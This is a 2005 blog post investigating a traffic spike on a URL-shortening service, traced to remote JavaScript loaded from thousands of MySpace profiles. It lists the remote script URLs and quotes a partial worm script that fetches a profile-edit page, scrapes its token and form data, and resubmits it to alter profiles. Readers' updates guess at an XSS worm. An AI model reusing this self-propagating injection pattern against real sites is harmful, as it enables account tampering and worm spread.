Thursday, December 08, 2005

 

mystery: myspace sends xents a half million hits

So I know the webmaster over at xents.com (short url service) and he was telling me that five of their links produced an incredible half million hits in the last two days. Poor little box the site runs on was nearly buried alive. It appears that someone used the url redirection to load a remote javascript file on literally thousands of myspace pages. The problem is that neither of us can figure out what the file does or how it got so widely dispersed on myspace. Any smart people able to lend a clue?

Here is the javascript files:

http://home.doramail.com/90za:doramail.com/a.js
http://http://90za.biz.tc/b.js
http://90za.biz.tc/b.js
http://64.34.165.134/c.js
http://64.207.146.9/d.js

And here are 5 (of thousands) myspace profiles that loaded it. Warning, these pages may not be safe for work. Search the source for "xents" to see the javascript call:

Profile 1
Profile 2
Profile 3

Here is the hit count spike:

12/01/2005 1
12/02/2005 3
12/03/2005 3
12/04/2005 8
12/05/2005 916
12/06/2005 412888
12/07/2005 11610
12/08/2005 814

Would love to be able to publish more information.




UPDATE form digg user bonzooznob:

XSS hack in progress is my guess...

Since the file it points to, isn't there (yet), this may be a ticking time bomb...

(Similar to the Sober virus due to hit on Jan 5th, 2006)
http://www.f-secure.com/weblog/

If I was a MySpace user, and I had anything important on there, I would consider making a backup ;-)

UPDATE: If I'm ready this write it appears to be using javascript to pull data off the page and make a form submission to MySpace. Very clever. Anyone able to figure out more?
if(window.location.hostname=='profile.myspace.com'){
window.location.href='http://www.myspace.com'+location.pathname+location.search;
}else if (window.location.href.indexOf("http://editprofile.myspace.com/index.cfm?fuseaction=profile.basic") != -1 ){
window.location.href='http://profiles.myspace.com/';
}else{
occPage = request("http://www.myspace.com/index.cfm?fuseaction=profile.editBasic", "GET", null);
occPage.onreadystatechange = function (){
if (occPage.readyState == 4) {
if (occPage.status == 200) {
currToken = getToken(occPage);
var occVars = parseForm(occPage);
var occForm = "http://www.myspace.com/index.cfm?fuseaction=profile.processBasic&Mytoken=" + currToken;
addOcc = request(occForm, "POST", occVars);
} else {
}
}
}
UPDATE: looks like this may not be the first time this has happened. Found a digg link from 25 days ago about the last MySpace worm. Also found some more information on how that worm worked.


Comments:
It looks like the javascript was added to the occupation field of these profiles. No idea why everyone would change that field on their own.
 
Post a Comment



<< Home

This page is powered by Blogger. Isn't yours?